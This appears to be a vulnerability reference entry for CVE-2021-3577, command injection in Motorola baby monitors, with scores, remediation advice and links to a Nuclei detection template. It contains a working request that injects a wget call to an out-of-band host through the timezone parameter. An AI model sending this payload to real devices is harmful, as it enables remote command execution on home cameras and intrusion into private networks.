| Title | Motorola Baby Monitors - Remote Command Execution |
|---|---|
| Author | gy741 |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network. |
| Remediation | Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks. |
| CVSS Score | 8.8 |
| EPSS Score | 0.86428 |
| CVE ID | CVE-2021-3577 |
| CWE ID | CWE-863,CWE-78 |
| Tags | cve2021 cve rce oast motorola iot binatoneglobal vkev vuln |
Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
GET /?action=command&command=set_city_timezone&value=$(wget%20http://d5jnurple0o09a6bsl4gch65z8mpaz11y.oast.live)) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Connection: close
Accept: */*
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3577.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-3577.pcap
N/AN/A